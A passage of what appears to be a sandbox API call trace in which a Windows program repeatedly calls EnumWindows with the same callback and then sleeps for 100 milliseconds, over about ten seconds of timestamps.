[0276.026] Sleep (dwMilliseconds=0x64) [0276.065] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0276.066] Sleep (dwMilliseconds=0x64) [0276.101] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0276.101] Sleep (dwMilliseconds=0x64) [0276.112] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0276.113] Sleep (dwMilliseconds=0x64) [0276.146] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0276.146] Sleep (dwMilliseconds=0x64) [0276.185] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0276.185] Sleep (dwMilliseconds=0x64) [0276.208] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0276.208] Sleep (dwMilliseconds=0x64) [0276.225] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0276.225] Sleep (dwMilliseconds=0x64) [0276.293] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0276.294] Sleep (dwMilliseconds=0x64) [0276.328] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0276.329] Sleep (dwMilliseconds=0x64) [0276.334] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0276.335] Sleep (dwMilliseconds=0x64) [0276.370] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0276.370] Sleep (dwMilliseconds=0x64) [0276.406] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0276.407] Sleep (dwMilliseconds=0x64) [0276.414] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0276.414] Sleep (dwMilliseconds=0x64) [0276.445] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0276.445] Sleep (dwMilliseconds=0x64) [0276.483] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0276.483] Sleep (dwMilliseconds=0x64) [0276.503] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0276.503] Sleep (dwMilliseconds=0x64) [0276.523] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0276.523] Sleep (dwMilliseconds=0x64) [0276.567] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0276.568] Sleep (dwMilliseconds=0x64) [0276.591] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0276.592] Sleep (dwMilliseconds=0x64) [0276.609] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0276.609] Sleep (dwMilliseconds=0x64) [0276.660] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0276.660] Sleep (dwMilliseconds=0x64) [0276.695] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0276.696] Sleep (dwMilliseconds=0x64) [0276.732] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0276.732] Sleep (dwMilliseconds=0x64) [0276.774] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0276.774] Sleep (dwMilliseconds=0x64) [0276.785] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0276.785] Sleep (dwMilliseconds=0x64) [0276.811] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0276.811] Sleep (dwMilliseconds=0x64) [0276.855] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0276.855] Sleep (dwMilliseconds=0x64) [0276.881] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0276.881] Sleep (dwMilliseconds=0x64) [0276.898] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0276.899] Sleep (dwMilliseconds=0x64) [0276.935] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0276.935] Sleep (dwMilliseconds=0x64) [0276.970] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0276.971] Sleep (dwMilliseconds=0x64) [0276.972] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0276.973] Sleep (dwMilliseconds=0x64) [0276.979] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0276.979] Sleep (dwMilliseconds=0x64) [0277.016] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0277.016] Sleep (dwMilliseconds=0x64) [0277.054] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0277.054] Sleep (dwMilliseconds=0x64) [0277.060] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0277.061] Sleep (dwMilliseconds=0x64) [0277.090] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0277.091] Sleep (dwMilliseconds=0x64) [0277.127] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0277.127] Sleep (dwMilliseconds=0x64) [0277.142] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0277.143] Sleep (dwMilliseconds=0x64) [0277.164] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0277.165] Sleep (dwMilliseconds=0x64) [0277.200] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0277.201] Sleep (dwMilliseconds=0x64) [0277.225] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0277.226] Sleep (dwMilliseconds=0x64) [0277.240] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0277.240] Sleep (dwMilliseconds=0x64) [0277.302] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0277.303] Sleep (dwMilliseconds=0x64) [0277.344] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0277.344] Sleep (dwMilliseconds=0x64) [0277.380] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0277.380] Sleep (dwMilliseconds=0x64) [0277.416] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0277.416] Sleep (dwMilliseconds=0x64) [0277.427] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0277.427] Sleep (dwMilliseconds=0x64) [0277.544] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0277.544] Sleep (dwMilliseconds=0x64) [0277.587] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0277.588] Sleep (dwMilliseconds=0x64) [0277.612] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0277.613] Sleep (dwMilliseconds=0x64) [0277.624] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0277.625] Sleep (dwMilliseconds=0x64) [0277.672] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0277.673] Sleep (dwMilliseconds=0x64) [0277.707] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0277.708] Sleep (dwMilliseconds=0x64) [0277.710] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0277.711] Sleep (dwMilliseconds=0x64) [0277.746] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0277.746] Sleep (dwMilliseconds=0x64) [0277.783] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0277.784] Sleep (dwMilliseconds=0x64) [0277.796] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0277.796] Sleep (dwMilliseconds=0x64) [0277.820] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0277.820] Sleep (dwMilliseconds=0x64) [0277.862] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0277.863] Sleep (dwMilliseconds=0x64) [0277.926] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0277.926] Sleep (dwMilliseconds=0x64) [0277.953] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0277.953] Sleep (dwMilliseconds=0x64) [0277.992] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0277.992] Sleep (dwMilliseconds=0x64) [0278.026] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0278.026] Sleep (dwMilliseconds=0x64) [0278.059] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0278.060] Sleep (dwMilliseconds=0x64) [0278.100] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0278.101] Sleep (dwMilliseconds=0x64) [0278.149] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0278.149] Sleep (dwMilliseconds=0x64) [0278.196] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0278.196] Sleep (dwMilliseconds=0x64) [0278.287] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0278.288] Sleep (dwMilliseconds=0x64) [0278.367] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0278.367] Sleep (dwMilliseconds=0x64) [0278.400] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0278.401] Sleep (dwMilliseconds=0x64) [0278.433] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0278.433] Sleep (dwMilliseconds=0x64) [0278.505] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0278.506] Sleep (dwMilliseconds=0x64) [0278.577] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0278.577] Sleep (dwMilliseconds=0x64) [0278.606] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0278.607] Sleep (dwMilliseconds=0x64) [0278.748] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0278.888] Sleep (dwMilliseconds=0x64) [0278.951] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0278.952] Sleep (dwMilliseconds=0x64) [0279.025] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0279.080] Sleep (dwMilliseconds=0x64) [0279.081] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0279.082] Sleep (dwMilliseconds=0x64) [0279.083] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0279.083] Sleep (dwMilliseconds=0x64) [0279.085] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0279.085] Sleep (dwMilliseconds=0x64) [0279.088] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0279.089] Sleep (dwMilliseconds=0x64) [0279.090] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0279.090] Sleep (dwMilliseconds=0x64) [0279.092] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0279.093] Sleep (dwMilliseconds=0x64) [0279.098] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0279.098] Sleep (dwMilliseconds=0x64) [0279.100] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0279.100] Sleep (dwMilliseconds=0x64) [0279.102] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0279.102] Sleep (dwMilliseconds=0x64) [0279.104] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0279.104] Sleep (dwMilliseconds=0x64) [0279.109] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0279.110] Sleep (dwMilliseconds=0x64) [0279.115] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0279.116] Sleep (dwMilliseconds=0x64) [0279.122] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0279.123] Sleep (dwMilliseconds=0x64) [0279.125] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0279.125] Sleep (dwMilliseconds=0x64) [0279.128] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0279.128] Sleep (dwMilliseconds=0x64) [0279.132] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0279.132] Sleep (dwMilliseconds=0x64) [0279.134] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0279.134] Sleep (dwMilliseconds=0x64) [0279.138] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0279.139] Sleep (dwMilliseconds=0x64) [0279.140] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0279.140] Sleep (dwMilliseconds=0x64) [0279.142] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0279.143] Sleep (dwMilliseconds=0x64) [0279.144] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0279.144] Sleep (dwMilliseconds=0x64) [0279.146] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0279.146] Sleep (dwMilliseconds=0x64) [0279.149] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0279.149] Sleep (dwMilliseconds=0x64) [0279.151] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0279.152] Sleep (dwMilliseconds=0x64) [0279.153] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0279.153] Sleep (dwMilliseconds=0x64) [0279.155] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0279.155] Sleep (dwMilliseconds=0x64) [0279.159] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0279.159] Sleep (dwMilliseconds=0x64) [0279.160] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0279.161] Sleep (dwMilliseconds=0x64) [0279.162] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0279.163] Sleep (dwMilliseconds=0x64) [0279.164] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0279.164] Sleep (dwMilliseconds=0x64) [0279.166] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0279.166] Sleep (dwMilliseconds=0x64) [0279.168] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0279.168] Sleep (dwMilliseconds=0x64) [0279.171] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0279.171] Sleep (dwMilliseconds=0x64) [0279.175] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0279.175] Sleep (dwMilliseconds=0x64) [0279.179] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0279.182] Sleep (dwMilliseconds=0x64) [0279.185] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0279.186] Sleep (dwMilliseconds=0x64) [0279.188] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0279.188] Sleep (dwMilliseconds=0x64) [0279.189] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0279.190] Sleep (dwMilliseconds=0x64) [0279.192] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0279.193] Sleep (dwMilliseconds=0x64) [0279.195] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0279.195] Sleep (dwMilliseconds=0x64) [0279.197] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0279.197] Sleep (dwMilliseconds=0x64) [0279.198] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0279.199] Sleep (dwMilliseconds=0x64) [0279.201] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0279.201] Sleep (dwMilliseconds=0x64) [0279.203] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0279.206] Sleep (dwMilliseconds=0x64) [0279.207] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0279.208] Sleep (dwMilliseconds=0x64) [0279.210] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0279.211] Sleep (dwMilliseconds=0x64) [0279.213] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0279.306] Sleep (dwMilliseconds=0x64) [0279.336] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0279.337] Sleep (dwMilliseconds=0x64) [0279.386] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0279.386] Sleep (dwMilliseconds=0x64) [0279.643] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0279.643] Sleep (dwMilliseconds=0x64) [0279.789] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0279.789] Sleep (dwMilliseconds=0x64) [0279.947] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0279.955] Sleep (dwMilliseconds=0x64) [0280.161] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0280.168] Sleep (dwMilliseconds=0x64) [0280.650] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0280.652] Sleep (dwMilliseconds=0x64) [0280.950] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0280.951] Sleep (dwMilliseconds=0x64) [0281.151] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0281.152] Sleep (dwMilliseconds=0x64) [0281.233] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0281.234] Sleep (dwMilliseconds=0x64) [0281.264] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0281.264] Sleep (dwMilliseconds=0x64) [0281.281] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0281.282] Sleep (dwMilliseconds=0x64) [0281.418] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0281.418] Sleep (dwMilliseconds=0x64) [0281.449] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0281.449] Sleep (dwMilliseconds=0x64) [0281.462] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0281.462] Sleep (dwMilliseconds=0x64) [0281.503] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0281.504] Sleep (dwMilliseconds=0x64) [0281.541] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0281.542] Sleep (dwMilliseconds=0x64) [0281.548] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0281.549] Sleep (dwMilliseconds=0x64) [0281.586] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0281.588] Sleep (dwMilliseconds=0x64) [0281.625] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0281.625] Sleep (dwMilliseconds=0x64) [0281.640] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0281.641] Sleep (dwMilliseconds=0x64) [0281.678] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0281.679] Sleep (dwMilliseconds=0x64) [0281.891] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0281.893] Sleep (dwMilliseconds=0x64) [0281.984] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0281.985] Sleep (dwMilliseconds=0x64) [0282.057] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0282.058] Sleep (dwMilliseconds=0x64) [0282.106] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0282.106] Sleep (dwMilliseconds=0x64) [0282.170] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0282.171] Sleep (dwMilliseconds=0x64) [0282.389] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0282.390] Sleep (dwMilliseconds=0x64) [0282.426] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0282.426] Sleep (dwMilliseconds=0x64) [0282.442] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0282.442] Sleep (dwMilliseconds=0x64) [0282.469] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0282.470] Sleep (dwMilliseconds=0x64) [0282.510] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0282.510] Sleep (dwMilliseconds=0x64) [0282.533] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0282.534] Sleep (dwMilliseconds=0x64) [0282.548] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0282.548] Sleep (dwMilliseconds=0x64) [0282.584] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0282.584] Sleep (dwMilliseconds=0x64) [0282.615] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0282.616] Sleep (dwMilliseconds=0x64) [0282.663] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0282.664] Sleep (dwMilliseconds=0x64) [0282.725] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0282.726] Sleep (dwMilliseconds=0x64) [0282.778] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0282.779] Sleep (dwMilliseconds=0x64) [0282.781] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0282.782] Sleep (dwMilliseconds=0x64) [0282.820] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0282.821] Sleep (dwMilliseconds=0x64) [0282.918] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0282.918] Sleep (dwMilliseconds=0x64) [0282.935] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0282.935] Sleep (dwMilliseconds=0x64) [0282.968] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0282.968] Sleep (dwMilliseconds=0x64) [0283.008] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0283.009] Sleep (dwMilliseconds=0x64) [0283.038] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0283.039] Sleep (dwMilliseconds=0x64) [0283.058] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0283.059] Sleep (dwMilliseconds=0x64) [0283.102] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0283.102] Sleep (dwMilliseconds=0x64) [0283.135] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0283.136] Sleep (dwMilliseconds=0x64) [0283.142] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0283.142] Sleep (dwMilliseconds=0x64) [0283.512] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0283.512] Sleep (dwMilliseconds=0x64) [0283.811] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0283.812] Sleep (dwMilliseconds=0x64) [0284.114] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0284.115] Sleep (dwMilliseconds=0x64) [0284.365] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0284.365] Sleep (dwMilliseconds=0x64) [0284.506] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0284.507] Sleep (dwMilliseconds=0x64) [0284.650] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0284.651] Sleep (dwMilliseconds=0x64) [0284.668] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0284.668] Sleep (dwMilliseconds=0x64) [0284.704] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0284.704] Sleep (dwMilliseconds=0x64) [0284.736] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0284.737] Sleep (dwMilliseconds=0x64) [0284.741] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0284.742] Sleep (dwMilliseconds=0x64) [0284.777] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0284.778] Sleep (dwMilliseconds=0x64) [0284.814] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0284.814] Sleep (dwMilliseconds=0x64) [0284.868] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0284.869] Sleep (dwMilliseconds=0x64) [0284.898] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0284.899] Sleep (dwMilliseconds=0x64) [0284.934] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0284.934] Sleep (dwMilliseconds=0x64) [0284.955] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0284.955] Sleep (dwMilliseconds=0x64) [0284.975] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0284.975] Sleep (dwMilliseconds=0x64) [0285.011] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0285.016] Sleep (dwMilliseconds=0x64) [0285.048] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0285.048] Sleep (dwMilliseconds=0x64) [0285.065] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0285.065] Sleep (dwMilliseconds=0x64) [0285.140] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0285.146] Sleep (dwMilliseconds=0x64) [0285.274] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0285.275] Sleep (dwMilliseconds=0x64) [0285.313] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0285.314] Sleep (dwMilliseconds=0x64) [0285.386] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0285.387] Sleep (dwMilliseconds=0x64) [0285.426] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0285.426] Sleep (dwMilliseconds=0x64) [0285.438] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0285.439] Sleep (dwMilliseconds=0x64) [0285.463] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0285.463] Sleep (dwMilliseconds=0x64) [0285.500] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0285.501] Sleep (dwMilliseconds=0x64) [0285.533] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0285.534] Sleep (dwMilliseconds=0x64) [0285.546] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0285.546] Sleep (dwMilliseconds=0x64) [0285.624] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0285.625] Sleep (dwMilliseconds=0x64) [0285.627] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0285.627] Sleep (dwMilliseconds=0x64) [0285.662] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0285.662] Sleep (dwMilliseconds=0x64) [0285.697] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0285.697] Sleep (dwMilliseconds=0x64) [0285.707] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0285.707] Sleep (dwMilliseconds=0x64) [0285.736] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0285.736] Sleep (dwMilliseconds=0x64) [0285.776] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0285.777] Sleep (dwMilliseconds=0x64) [0285.795] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0285.796] Sleep (dwMilliseconds=0x64) [0285.818] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0285.818] Sleep (dwMilliseconds=0x64) [0285.887] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0285.888] Sleep (dwMilliseconds=0x64) [0285.918] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0285.918] Sleep (dwMilliseconds=0x64) [0285.928] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0285.928] Sleep (dwMilliseconds=0x64) [0285.963] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0285.964] Sleep (dwMilliseconds=0x64) [0286.000] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0286.000] Sleep (dwMilliseconds=0x64) [0286.002] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0286.003] Sleep (dwMilliseconds=0x64) [0286.037] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0286.037] Sleep (dwMilliseconds=0x64) [0286.074] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0286.074] Sleep (dwMilliseconds=0x64) [0286.097] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0286.097] Sleep (dwMilliseconds=0x64) [0286.122] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0286.123] Sleep (dwMilliseconds=0x64) [0286.157] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0286.157] Sleep (dwMilliseconds=0x64) [0286.198] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0286.198] Sleep (dwMilliseconds=0x64) [0286.216] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0286.217] Sleep (dwMilliseconds=0x64) [0286.256] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0286.257] Sleep (dwMilliseconds=0x64) [0286.286] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0286.287] Sleep (dwMilliseconds=0x64) [0286.294] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0286.294] Sleep (dwMilliseconds=0x64) [0286.330] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0286.331] Sleep (dwMilliseconds=0x64) [0286.372] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0286.373] Sleep (dwMilliseconds=0x64) [0286.377] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0286.377] Sleep (dwMilliseconds=0x64) [0286.410] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0286.411] Sleep (dwMilliseconds=0x64) [0286.455] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0286.456] Sleep (dwMilliseconds=0x64) [0286.468] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0286.469] Sleep (dwMilliseconds=0x64) [0286.495] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0286.496] Sleep (dwMilliseconds=0x64) [0286.531] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) 